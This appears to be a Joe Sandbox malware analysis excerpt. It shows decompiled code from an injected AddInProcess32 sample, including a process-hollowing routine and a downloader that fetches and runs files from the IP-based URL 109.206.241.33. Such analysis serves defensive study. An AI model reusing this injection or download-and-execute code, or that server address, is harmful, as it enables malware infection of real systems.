W, xrefs: 0040295E
0, xrefs: 0040288F
Error launching program, xrefs: 004023D4
__COMPAT_LAYER, xrefs: 004021B0
D, xrefs: 00402202
cmd /c start , xrefs: 004021DA
/quiet, xrefs: 0040229F, 004022F0, 00402341
SHELLRUNAS, xrefs: 004028ED
/raw, xrefs: 0040216F
RunAsInvoker, xrefs: 004021AB
/netonly, xrefs: 00402199, 00402372
Error launching application, xrefs: 00402823
/regnetonly, xrefs: 004022D2
cmd.exe, xrefs: 00402521
ICON, xrefs: 00402887, 004028B9

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: __wcsicmp$_memset$Message$CreateLoad$CloseDialogEnumErrorHandleIconLastProcessWindows_wcscpy_s$ClassCursorDispatchEnvironmentFreeLocalLogonParamRegisterSleepTranslateVariableWith__wcsicmp_l__wcslwr_s_l_wcscat_s
String ID: /netonly$/quiet$/raw$/reg$/regnetonly$/unreg$0$AboutUsage$D$D$Error launching application$Error launching program$ICON$RunAsInvoker$SHELLRUNAS$W$__COMPAT_LAYER$cmd /c start $cmd.exe
API String ID: 417924082-754762936
Opcode ID: 272b203ec08cb67b929b858a7bb471570156c7c47330ce23cc0cfe630b3236f6
Instruction ID: b9bcd2630ba5b8b6581695927ee2c04d685a99353c32d213ca7add1f89437002
Opcode Fuzzy Hash: 272b203ec08cb67b929b858a7bb471570156c7c47330ce23cc0cfe630b3236f6
Instruction Fuzzy Hash: 81228F71508300AFD728DB29C949B9BB7E8AB84305F04883EF598762D1D7BD9944CF6B

Uniqueness

Uniqueness Score: -1.00%

Function 02B522F0 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 309
memoryprocessCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E02B522F0(void* __ebx, signed int __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, intOrPtr* _a8) {
				signed int _v12;
				struct _CONTEXT _v736;
				void _v740;
				signed int _v744;
				void _v748;
				struct _PROCESS_INFORMATION _v768;
				WCHAR* _v772;
				signed int _v776;
				intOrPtr* _v780;
				void _v784;
				WCHAR* _v788;
				struct _MEMORY_BASIC_INFORMATION _v816;
				intOrPtr _v836;
				char _v840;
				struct _STARTUPINFOW _v912;
				signed int _t102;
				void* _t106;
				int _t110;
				intOrPtr* _t119;
				intOrPtr _t140;
				signed int _t144;
				intOrPtr _t171;
				void* _t173;
				intOrPtr _t186;
				unsigned int _t187;
				signed int _t189;
				void* _t192;
				intOrPtr _t193;
				WCHAR* _t196;
				void* _t197;
				unsigned int _t200;
				intOrPtr* _t203;
				WCHAR* _t204;
				intOrPtr* _t207;
				intOrPtr* _t209;
				WCHAR* _t210;
				signed int _t211;
				void* _t213;
				signed int _t216;
				signed int _t217;
				void* _t219;
				void* _t221;
				intOrPtr* _t223;
				signed int _t225;

				_t102 =  *0x2b56004; // 0xbb40e64e
				_v12 = _t102 ^ _t225;
				_t203 = _a8;
				_t209 = __edx;
				_v776 = _a4;
				_v744 = __ecx;
				_t173 = 0;
				_v780 = __edx;
				_v772 = _t203;
				_t106 = E02B52CE7(0,  &_v912, 0x44);
				_v912.cb = 0x44;
				E02B52CE7(_t106,  &_v768, 0x10);
				if(E02B52730(0, _t203, _t209) != 0) {
					if( *_t209 != 0x5a4d) {
						goto L1;
					}
					_t119 =  *((intOrPtr*)(_t209 + 0x3c)) + _t209;
					_v748 = _t119;
					if( *_t119 != 0x4550) {
						goto L1;
					}
					_t211 = 0;
					if(_t203 == 0) {
						L8:
						_t204 = HeapAlloc(GetProcessHeap(), 0, 0x21c + _t211 * 2);
						_v788 = _t204;
						if(_t204 == 0) {
							_t110 = 0;
							_t210 = 0;
							L36:
							if(_t210 != 0) {
								L39:
								if(_t173 != 0) {
									HeapFree(GetProcessHeap(), 0, _t173);
								}
								if(_t204 != 0) {
									HeapFree(GetProcessHeap(), 0, _t204);
								}
								return E02B53C33(_v12 ^ _t225);
							}
							L37:
							if(_v768.hProcess != 0) {
								TerminateProcess(_v768.hProcess, _t110);
							}
							goto L39;
						}
						E02B52CE7(0x21c + _t211 * 2, _t204, 0x21c + _t211 * 2);
						StrCatW(_t204, _v744);
						if(_t211 != 0) {
							StrCatW(_t204, " ");
							StrCatW(_t204, _v772);
						}
						_t210 = 0;
						if(CreateProcessW(0, _t204, 0, 0, 0, 4, 0, 0,  &_v912,  &_v768) != 0) {
							_v736.ContextFlags = 0x10007;
							if(GetThreadContext(_v768.hThread,  &_v736) == 0) {
								goto L12;
							}
							E02B52CE7(_t130,  &_v840, 0x18);
							_v772 = _v772 & _t173;
							_push( &_v772);
							_push(0x18);
							_push( &_v840);
							_push(0);
							_push(_v768.hProcess);
							if( *0x2b59390() >= 0) {
								_t173 = HeapAlloc(GetProcessHeap(), 0, _v776 << 3);
								_t213 = 0x10000;
								_t140 =  *((intOrPtr*)(_v748 + 0x50));
								_t141 =  <=  ? 0x190000 : _t140;
								_v748 =  <=  ? 0x190000 : _t140;
								while(1) {
									VirtualQueryEx(_v768.hProcess, _t213,  &_v816, 0x1c);
									_t186 = _v816.RegionSize;
									_t200 = _t213;
									_t213 = _v816.BaseAddress + _t186;
									if(_t186 >= _v748 && _v816.Protect == 1 && _v816.State == 0x10000) {
										break;
									}
									if(_t200 < 0x80000000) {
										continue;
									}
									goto L15;
								}
								_t144 = _t200;
								asm("cdq");
								_t187 = _t200;
								_t216 = (_t187 << 0x00000020 | _t144) >> 0x10;
								_t189 = (_t187 >> 0x00000010 << 0x00000020 | _t216) << 0x10;
								_t217 = _t216 << 0x10;
								if(_t217 != _t144 || _t189 != _t200) {
									_t144 = 0x10000 + _t217;
									asm("adc ecx, 0x0");
									_v748 = _t189;
								}
								_v748 = _t144;
								_t219 = _v836 + 8;
								_v776 = _t219;
								if(WriteProcessMemory(_v768.hProcess, _t219,  &_v748, 4, 0) == 0 || ReadProcessMemory(_v768.hProcess, _t219,  &_v740, 4, 0) == 0 || E02B5226E(_t173, _v780, _t173, _v740) == 0) {
									goto L15;
								} else {
									_t221 =  *((intOrPtr*)(_t173 + 0x3c)) + _t173;
									 *0x2b59394(_v768.hProcess, _v740);
									_t192 = VirtualAllocEx(_v768.hProcess, _v740,  *(_t221 + 0x50), 0x3000, 0x40);
									_v748 = _t192;
									if(_t192 == 0) {
										goto L15;
									}
									 *((intOrPtr*)(_t221 + 0x34)) = _v740;
									if(WriteProcessMemory(_v768.hProcess, _t192, _t173,  *(_t221 + 0x54), 0) == 0) {
										goto L15;
									}
									_v744 = _v744 & 0x00000000;
									_t193 =  *((intOrPtr*)(_t173 + 0x3c));
									if(0 >=  *(_t221 + 6)) {
										L34:
										_v784 = _v740;
										WriteProcessMemory(_v768.hProcess, _v776,  &_v784, 4, 0);
										_v736.Eax =  *((intOrPtr*)(_t221 + 0x28)) + _v784;
										SetThreadContext(_v768.hThread,  &_v736);
										ResumeThread(_v768.hThread);
										_t210 = _v768.dwProcessId;
										_t110 = 0;
										goto L36;
									}
									_t207 = _v780 + 0x104 + _t193;
									do {
										WriteProcessMemory(_v768, _v748 +  *_t207,  *_t207 + _t173,  *(_t207 + 4), 0);
										_t207 = _t207 + 0x28;
										_t196 = _v744 + 1;
										_v744 = _t196;
									} while (_t196 < ( *(_t221 + 6) & 0x0000ffff));
									_t204 = _v788;
									goto L34;
								}
							}
							L15:
							_t110 = 0;
							_t210 = 0;
						} else {
							L12:
							_t110 = 0;
						}
						goto L37;
					}
					_t223 = _t203;
					_t14 = _t223 + 2; // 0x2
					_t197 = _t14;
					do {
						_t171 =  *_t223;
						_t223 = _t223 + 2;
					} while (_t171 != 0);
					_t211 = _t223 - _t197 >> 1;
					goto L8;
				}
				L1:
				_t204 = _v740;
				_t110 = 0;
				_t210 = 0;
				goto L37;
			}

0x02b522f9
0x02b52300
0x02b52309
0x02b5230c
0x02b5230e
0x02b52316
0x02b5231c
0x02b52326
0x02b5232c
0x02b52332
0x02b52340
0x02b5234a
0x02b52357
0x02b52370
0x00000000
0x00000000
0x02b52375
0x02b52377
0x02b52383
0x00000000
0x00000000
0x02b52387
0x02b5238b
0x02b523a1
0x02b523b7
0x02b523b9
0x02b523c1
0x02b526d7
0x02b526d9
0x02b526db
0x02b526dd
0x02b526f5
0x02b526f7
0x02b52703
0x02b52703
0x02b5270b
0x02b52717
0x02b52717
0x02b5272f
0x02b5272f
0x02b526df
0x02b526e6
0x02b526ef
0x02b526ef
0x00000000
0x02b526e6
0x02b523d1
0x02b523de
0x02b523e6
0x02b523f4
0x02b523fd
0x02b523fd
0x02b52405
0x02b52420
0x02b5242f
0x02b52448
0x00000000
0x00000000
0x02b52458
0x02b5245d
0x02b5246a
0x02b5246b
0x02b52473
0x02b52474
0x02b52476
0x02b5247f
0x02b524a3
0x02b524b0
0x02b524b5
0x02b524ba
0x02b524bd
0x02b524c3
0x02b524d3
0x02b524d9
0x02b524df
0x02b524e7
0x02b524ef
0x00000000
0x00000000
0x02b5250c
0x00000000
0x00000000
0x00000000
0x02b5250e
0x02b52513
0x02b52515
0x02b52518
0x02b5251a
0x02b52521
0x02b52525
0x02b5252a
0x02b52532
0x02b52537
0x02b5253a
0x02b5253a
0x02b5254a
0x02b52550
0x02b52559
0x02b5256f
0x00000000
0x02b525b1
0x02b525c0
0x02b525c2
0x02b525e4
0x02b525e6
0x02b525ee
0x00000000
0x00000000
0x02b525ff
0x02b52612
0x00000000
0x00000000
0x02b52618
0x02b52621
0x02b52628
0x02b52676
0x02b52680
0x02b52699
0x02b526a8
0x02b526bb
0x02b526c7
0x02b526cd
0x02b526d3
0x00000000
0x02b526d3
0x02b52636
0x02b52638
0x02b52652
0x02b5265e
0x02b52665
0x02b52666
0x02b5266c
0x02b52670
0x00000000
0x02b52670
0x02b5256f
0x02b52481
0x02b52481
0x02b52483
0x02b52422
0x02b52422
0x02b52422
0x02b52422
0x00000000
0x02b52420
0x02b5238d
0x02b5238f
0x02b5238f
0x02b52392
0x02b52392
0x02b52395
0x02b52398
0x02b5239f
0x00000000
0x02b5239f
0x02b52359
0x02b52359
0x02b5235f
0x02b52361
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 02B523AA
HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02B523B1
StrCatW.SHLWAPI(00000000,?), ref: 02B523DE
StrCatW.SHLWAPI(00000000,02B542B4), ref: 02B523F4
StrCatW.SHLWAPI(00000000,?), ref: 02B523FD
CreateProcessW.KERNEL32 ref: 02B52418
TerminateProcess.KERNEL32(00000000,00000000,?,00000000), ref: 02B526EF
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 02B526FC
HeapFree.KERNEL32(00000000,?,00000000), ref: 02B52703
GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 02B52710
HeapFree.KERNEL32(00000000,?,00000000), ref: 02B52717

Strings

D, xrefs: 02B52340

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: Heap$Process$Free$AllocCreateTerminate
String ID: D
API String ID: 2370014981-2746444292
Opcode ID: 1d727646815faa7304c5c51b3945d65e93b6293f1a0d03e1be8ccf5e90f0e075
Instruction ID: a5d6c02516b5a858c17a3d1de5ad9c7b019a9c650b670e759d35a90f04aa699e
Opcode Fuzzy Hash: 1d727646815faa7304c5c51b3945d65e93b6293f1a0d03e1be8ccf5e90f0e075
Instruction Fuzzy Hash: 57C15A71A412399BDB259F14DC48BAEB7B9EF08740F1444E9EE09AB240DB709ED4CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02B51000 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 277
memorysleepfileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E02B51000(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v60;
				short _v580;
				long _v584;
				WCHAR* _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				char _v600;
				intOrPtr* _v604;
				struct _PROCESS_INFORMATION _v620;
				struct _STARTUPINFOW _v692;
				signed int _t68;
				void* _t74;
				WCHAR* _t76;
				short _t80;
				WCHAR* _t81;
				WCHAR* _t84;
				intOrPtr _t85;
				WCHAR* _t86;
				WCHAR* _t97;
				short _t98;
				WCHAR* _t103;
				void* _t104;
				void* _t115;
				void* _t117;
				void* _t125;
				void* _t129;
				intOrPtr* _t133;
				signed int _t135;
				WCHAR* _t136;
				void* _t139;
				intOrPtr _t143;
				WCHAR* _t144;
				intOrPtr* _t145;
				void* _t149;
				short* _t153;
				void* _t166;
				void* _t171;
				void* _t172;
				intOrPtr _t183;
				WCHAR* _t185;
				signed int _t189;
				void* _t190;
				long _t192;
				signed int _t193;
				void* _t194;
				intOrPtr* _t195;

				_t68 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t68 ^ _t193;
				_t192 = 0;
				_v600 = 0;
				_t129 = HeapAlloc(GetProcessHeap(), 8, 0x200000);
				_v596 = _t129;
				E02B52CE7(_t71, _t129, 0x200000);
				_pop(_t139);
				_t74 = E02B5213B(_t129, L"http://109.206.241.33/files/1un.config.CfgEncFile", 0x200000, 0, _t139, _t129,  &_v600);
				_t195 = _t194 + 0xc;
				if(_t74 == 0) {
					L19:
					return E02B53C33(_v8 ^ _t193);
				}
				_t183 = 0x168;
				_v592 = 0x168;
				do {
					_t143 =  *((intOrPtr*)(_t183 + _t129));
					_t7 = _t129 + 1; // 0x1
					_t171 = _t7 + _t183;
					_t185 = _t183 + 0x19 + _t129;
					_v588 = _t185;
					_t76 = _t185;
					if( *_t185 == _t192) {
						L4:
						_v584 = _t192;
						_t133 = _v596 + 0x1b + _v592 + (_t76 - _t185 >> 1) * 2;
						_t80 = 0;
						_v604 = _t133;
						_v580 = 0;
						if(_t143 == 0) {
							_t144 = 0x6d;
							do {
								 *((char*)(_t193 + _t80 - 0x38)) = _t144;
								_t80 = _t80 + 1;
								_t40 = _t80 + "midfile"; // 0x69666469
								_t144 =  *_t40;
								__eflags = _t144;
							} while (_t144 != 0);
							_t145 =  &_v60;
							_t172 = _t145 + 1;
							do {
								_t81 =  *_t145;
								_t145 = _t145 + 1;
								__eflags = _t81;
							} while (_t81 != 0);
							E02B52AC6(_t133,  &_v580,  &_v60, _t185, _t192, _t145 - _t172);
							_t84 = PathFileExistsW( &_v580);
							__eflags = _t84;
							if(_t84 == 0) {
								L12:
								_t149 = _t133 + 2;
								do {
									_t85 =  *_t133;
									_t133 = _t133 + 2;
								} while (_t85 != _t192);
								_t86 = _t185;
								_t135 = _t133 - _t149 >> 1;
								if( *_t185 == _t192) {
									goto L16;
								} else {
									goto L15;
								}
								do {
									L15:
									_t86 =  &(_t86[1]);
								} while ( *_t86 != _t192);
								goto L16;
							}
							DeleteFileW( &_v580);
							__imp__URLDownloadToFileW(_t192, _t133,  &_v580, _t192, _t192);
							__eflags = PathFileExistsW( &_v580);
							if(__eflags == 0) {
								goto L12;
							}
							_t97 = E02B53B3F(_t133,  &_v580, _v596 + _v592 + 1, _t185, _t192, __eflags);
							__eflags = _t97;
							if(_t97 == 0) {
								goto L12;
							}
							_t52 =  &(_t185[1]); // 0x151
							_t153 = _t52;
							do {
								_t98 =  *_t185;
								_t185 =  &(_t185[1]);
								__eflags = _t98 - _t192;
							} while (_t98 != _t192);
							_t189 = _t185 - _t153 >> 1;
							_t136 = HeapAlloc(GetProcessHeap(), _t192, 0x21c + _t189 * 2);
							__eflags = _t136;
							if(_t136 != 0) {
								E02B52CE7(0x21c + _t189 * 2, _t136, 0x21c + _t189 * 2);
							}
							_t103 = StrCatW(_t136,  &_v580);
							__eflags = _t189;
							if(_t189 == 0) {
								_t185 = _v588;
							} else {
								StrCatW(_t136, " ");
								_t185 = _v588;
								_t103 = StrCatW(_t136, _t185);
							}
							_t104 = E02B52CE7(_t103,  &_v692, 0x44);
							_v692.cb = 0x44;
							E02B52CE7(_t104,  &_v620, 0x10);
							CreateProcessW(_t192, _t136, _t192, _t192, _t192, _t192, _t192, _t192,  &_v692,  &_v620);
							CloseHandle(_v620);
							CloseHandle(_v620.hThread);
							Sleep(0x64);
							_t133 = _v604;
							goto L12;
						}
						_t115 = E02B51D9D(_t133, _t133, _t171, _t185, _t192, _t143, _t143, _t192,  &_v584);
						_t195 = _t195 + 0x10;
						if(_t115 != 3) {
							L8:
							_t190 = _t192;
							L9:
							E02B52AC6(_t133,  &_v580, _t190, _t190, _t192, _v584);
							 *_t195 = 0x1c00;
							_t117 = E02B52AC6(_t133,  &_v580, 0x2b57468, _t190, _t192);
							_pop(_t163);
							_t203 = _t117;
							if(_t117 != 0) {
								E02B522F0(_t133,  &_v580, _t190, _t190, _t192, _t203, _v584, _v588);
								_t195 = _t195 + 0xc;
								HeapFree(GetProcessHeap(), _t192, _t190);
							}
							_t185 = _v588;
							goto L12;
						}
						_t190 = HeapAlloc(GetProcessHeap(), 8, _v584);
						E02B52CE7(_t122, _t190, _v584);
						_pop(_t166);
						_t125 = E02B51D9D(_t133, _t133, _v596 + _v592 + 1, _t190, _t192, _t166, _t166, _t190,  &_v584);
						_t195 = _t195 + 0x10;
						if(_t125 == 1) {
							goto L9;
						}
						HeapFree(GetProcessHeap(), _t192, _t190);
						goto L8;
					} else {
						goto L3;
					}
					do {
						L3:
						_t76 =  &(_t76[1]);
					} while ( *_t76 != _t192);
					goto L4;
					L16:
					_t129 = _v596;
					_t183 = _v592 + ((_t86 - _t185 >> 1) + _t135) * 2 + 0x1d;
					_v592 = _t183;
				} while (_t183 + 4 != _v600);
				while(E02B53A3D(_t192) == 0) {
					Sleep(0x3e8);
					_t192 = _t192 + 1;
					if(_t192 < 0x258) {
						continue;
					}
					goto L19;
				}
				goto L19;
			}

0x02b51009
0x02b51010
0x02b5101b
0x02b51020
0x02b51033
0x02b51038
0x02b5103e
0x02b51043
0x02b51052
0x02b51057
0x02b5105c
0x02b51207
0x02b51217
0x02b51217
0x02b51062
0x02b51067
0x02b5106d
0x02b5106d
0x02b51070
0x02b51073
0x02b51078
0x02b5107a
0x02b51080
0x02b51085
0x02b5108f
0x02b51099
0x02b510ab
0x02b510ad
0x02b510af
0x02b510b5
0x02b510be
0x02b51218
0x02b5121a
0x02b5121a
0x02b5121e
0x02b5121f
0x02b5121f
0x02b51225
0x02b51225
0x02b51229
0x02b5122c
0x02b5122f
0x02b5122f
0x02b51231
0x02b51232
0x02b51232
0x02b51242
0x02b5124f
0x02b51255
0x02b51257
0x02b5119c
0x02b5119c
0x02b5119f
0x02b5119f
0x02b511a2
0x02b511a5
0x02b511ac
0x02b511ae
0x02b511b3
0x00000000
0x00000000
0x00000000
0x00000000
0x02b511b5
0x02b511b5
0x02b511b5
0x02b511b8
0x00000000
0x02b511b5
0x02b51264
0x02b51275
0x02b51288
0x02b5128a
0x00000000
0x00000000
0x02b512a5
0x02b512aa
0x02b512ac
0x00000000
0x00000000
0x02b512b2
0x02b512b2
0x02b512b5
0x02b512b5
0x02b512b8
0x02b512bb
0x02b512bb
0x02b512c2
0x02b512da
0x02b512dc
0x02b512de
0x02b512ea
0x02b512ef
0x02b512f8
0x02b512fe
0x02b51300
0x02b5131e
0x02b51302
0x02b51308
0x02b5130e
0x02b51316
0x02b51316
0x02b5132c
0x02b5133a
0x02b51344
0x02b51360
0x02b51372
0x02b5137a
0x02b5137e
0x02b51384
0x00000000
0x02b51384
0x02b510d0
0x02b510d5
0x02b510db
0x02b51139
0x02b51139
0x02b5113b
0x02b51149
0x02b51153
0x02b51160
0x02b51165
0x02b51166
0x02b51168
0x02b5117f
0x02b51184
0x02b51190
0x02b51190
0x02b51196
0x00000000
0x02b51196
0x02b510f8
0x02b510fc
0x02b5110d
0x02b5111d
0x02b51122
0x02b51128
0x00000000
0x00000000
0x02b51133
0x00000000
0x00000000
0x00000000
0x00000000
0x02b51087
0x02b51087
0x02b51087
0x02b5108a
0x00000000
0x02b511bd
0x02b511c9
0x02b511d2
0x02b511d5
0x02b511de
0x02b511ea
0x02b511f8
0x02b511fe
0x02b51205
0x00000000
0x00000000
0x00000000
0x02b51205
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00200000,?,00000000), ref: 02B51026
HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02B5102D
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,00000000), ref: 02B510E5
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02B510EC
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B5112C
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B51133
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 02B51189
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 02B51190
Sleep.KERNEL32(000003E8,?,00000000), ref: 02B511F8
PathFileExistsW.SHLWAPI(?,?,00000000), ref: 02B5124F
DeleteFileW.KERNEL32(?,?,00000000), ref: 02B51264
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 02B51275
PathFileExistsW.SHLWAPI(?,?,00000000), ref: 02B51282
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 02B512CD
HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02B512D4
StrCatW.SHLWAPI(00000000,?), ref: 02B512F8
StrCatW.SHLWAPI(00000000,02B542B4), ref: 02B51308
StrCatW.SHLWAPI(00000000,?), ref: 02B51316
CreateProcessW.KERNEL32 ref: 02B51360
CloseHandle.KERNEL32(?,?,00000000), ref: 02B51372
CloseHandle.KERNEL32(?,?,00000000), ref: 02B5137A
Sleep.KERNEL32(00000064,?,00000000), ref: 02B5137E

Strings

http://109.206.241.33/files/1un.config.CfgEncFile, xrefs: 02B5104D
D, xrefs: 02B5133A

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: Heap$Process$File$Alloc$CloseExistsFreeHandlePathSleep$CreateDeleteDownload
String ID: D$http://109.206.241.33/files/1un.config.CfgEncFile
API String ID: 1600074791-2963522458
Opcode ID: b2edb745f29f40c0b21c61d5d9b76109c268648b5f3b8f32dbd313589820a59d
Instruction ID: 5672dd783a8149d5316c3ad44bc871f535f52308d2665a6a758fd98d8c43f8bf
Opcode Fuzzy Hash: b2edb745f29f40c0b21c61d5d9b76109c268648b5f3b8f32dbd313589820a59d
Instruction Fuzzy Hash: 37A171729102299BDB25AF68DC88BEEB77AFF44340F1805D9E90D9B250DB309AD5CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00402CB0 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 195
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00402CB0(void* __ecx, WCHAR* __edi, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, char _a24, char _a28, intOrPtr _a32, char _a36, char _a40, intOrPtr _a44, char _a48, char _a56, WCHAR* _a60, char* _a64, WCHAR* _a68, WCHAR* _a72, char _a76, char _a78, char _a1104, char _a1106, signed int _a66600, signed int _a66640, intOrPtr _a66648, intOrPtr _a66652, intOrPtr _a66656, intOrPtr _a66660) {
				char _v0;
				char _v20;
				char _v24;
				char _v28;
				long _v32;
				intOrPtr _v36;
				char* _v40;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t69;
				_Unknown_base(*)()* _t79;
				_Unknown_base(*)()* _t81;
				char* _t83;
				long _t84;
				void* _t86;
				long _t87;
				_Unknown_base(*)()* _t93;
				void* _t97;
				intOrPtr _t107;
				WCHAR* _t129;
				void* _t131;
				long _t132;
				void* _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t138;

				_t129 = __edi;
				E0040B320(0x10454);
				_t69 =  *0x413004; // 0x98fc836b
				_a66640 = _t69 ^ _t137;
				_t135 = _a66656;
				_t131 = __ecx;
				_a20 = _a66652;
				_a12 = 0x100;
				_a8 = 0x151;
				_a1104 = 0;
				E00409280(__edi,  &_a1106, 0, 0xfffe);
				_a76 = 0;
				E00409280(_t129,  &_a78, 0, 0x402);
				_a32 = 0;
				_a36 = 0;
				_a40 = 0;
				_a44 = 0;
				_a28 = 0;
				_a24 = 0;
				_v0 = 0;
				_a4 = 0;
				_a48 = 0;
				_a16 = 0x201;
				E0040366B(E004036E5( &_a1104,  &_a1104, 0x8000, L"Please enter credentials to use for "),  &_a1104, 0x8000, _t131);
				_t138 = _t137 + 0x30;
				_a28 = 0x14;
				_a40 = L"Sysinternals Run as Different User (Netonly)";
				if(_a66648 == 0) {
					_a40 = L"Sysinternals Run as Different User";
				}
				_a36 =  &_a1104;
				_t79 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUIPromptForWindowsCredentialsW");
				if(_t79 == 0) {
					 *_t129 = 0;
					_t81 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUIPromptForCredentialsW");
					_a56 = 0;
					_a64 = 0;
					_a68 = 0;
					_a60 = 0;
					_a72 = 0;
					_a64 =  &_a1104;
					_a56 = 0x14;
					_a68 = L"ShellRunas - Sysinternals: www.sysinternals.com";
					_t132 =  *_t81( &_a56, _t131, 0, 0,  &_a76, _a16, _t135, _a12,  &_a48, 0x40082);
					if(_t132 != 0) {
						goto L12;
					}
					_t86 = E00403939( &_a36, 0x5c);
					_t138 = _t138 + 8;
					if(_t86 == 0) {
						E004036E5(_t86, _v20, 0x201,  &_a36);
						_t138 = _t138 + 0xc;
						GetComputerNameW(_t129,  &_v32);
					}
					goto L9;
				} else {
					_t132 =  *_t79( &_a28, _a66660,  &_a24, 0, 0,  &_v0,  &_a4, 0, 0);
					if(_t132 != 0) {
						L12:
						_t83 = _v40;
						if(_t83 == 0) {
							L17:
							_t84 = _t132;
							_pop(_t133);
							_pop(_t97);
							E0040318A(_t84, _t97, _a66600 ^ _t138, _t133);
							return _t84;
						}
						_t107 = _v36;
						if(_t107 == 0) {
							L16:
							__imp__CoTaskMemFree(_t83);
							goto L17;
						} else {
							goto L14;
						}
						do {
							L14:
							 *_t83 = 0;
							_t83 = _t83 + 1;
							_t107 = _t107 - 1;
						} while (_t107 != 0);
						_t83 = _v40;
						goto L16;
					}
					_a16 = _v28;
					_t93 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUnPackAuthenticationBufferW");
					_push( &_v24);
					_push(_t135);
					_push( &_a16);
					_push(_t129);
					_push( &_v20);
					_push( &_a40);
					_push(_v32);
					_push(_v36);
					_push(1);
					if( *_t93() != 0) {
						L9:
						if( *_t129 != 0) {
							goto L12;
						}
						_t87 =  &_a36;
						__imp__CredUIParseUserNameW(_t87, _v20, 0x201, _t129, _v32);
						L11:
						_t132 = _t87;
						goto L12;
					}
					_t87 = GetLastError();
					goto L11;
				}
			}

0x00402cb0
0x00402cb5
0x00402cba
0x00402cc1
0x00402cd1
0x00402ce0
0x00402ceb
0x00402cef
0x00402cf7
0x00402cff
0x00402d07
0x00402d17
0x00402d1c
0x00402d28
0x00402d2c
0x00402d30
0x00402d34
0x00402d45
0x00402d49
0x00402d4d
0x00402d51
0x00402d55
0x00402d59
0x00402d74
0x00402d79
0x00402d83
0x00402d8b
0x00402d93
0x00402d95
0x00402d95
0x00402dae
0x00402db9
0x00402dc1
0x00402e53
0x00402e5d
0x00402e6a
0x00402e6e
0x00402e72
0x00402e76
0x00402e7a
0x00402e85
0x00402ea6
0x00402eae
0x00402eb8
0x00402ebc
0x00000000
0x00000000
0x00402ec5
0x00402eca
0x00402ecf
0x00402ee0
0x00402ee5
0x00402eee
0x00402eee
0x00000000
0x00402dc7
0x00402de9
0x00402ded
0x00402f16
0x00402f16
0x00402f1c
0x00402f3b
0x00402f42
0x00402f44
0x00402f46
0x00402f49
0x00402f54
0x00402f54
0x00402f1e
0x00402f24
0x00402f34
0x00402f35
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f26
0x00402f26
0x00402f26
0x00402f28
0x00402f2b
0x00402f2b
0x00402f30
0x00000000
0x00402f30
0x00402e01
0x00402e0c
0x00402e16
0x00402e17
0x00402e1c
0x00402e1d
0x00402e22
0x00402e2b
0x00402e30
0x00402e31
0x00402e32
0x00402e38
0x00402ef4
0x00402ef7
0x00000000
0x00000000
0x00402f09
0x00402f0e
0x00402f14
0x00402f14
0x00000000
0x00402f14
0x00402e3e
0x00000000
0x00402e3e

APIs

_memset.LIBCMT ref: 00402D07
_memset.LIBCMT ref: 00402D1C
_wcscpy_s.LIBCMT ref: 00402D61
_wcscat_s.LIBCMT ref: 00402D74
LoadLibraryW.KERNEL32(Credui.dll,CredUIPromptForWindowsCredentialsW), ref: 00402DB2
GetProcAddress.KERNEL32(00000000), ref: 00402DB9
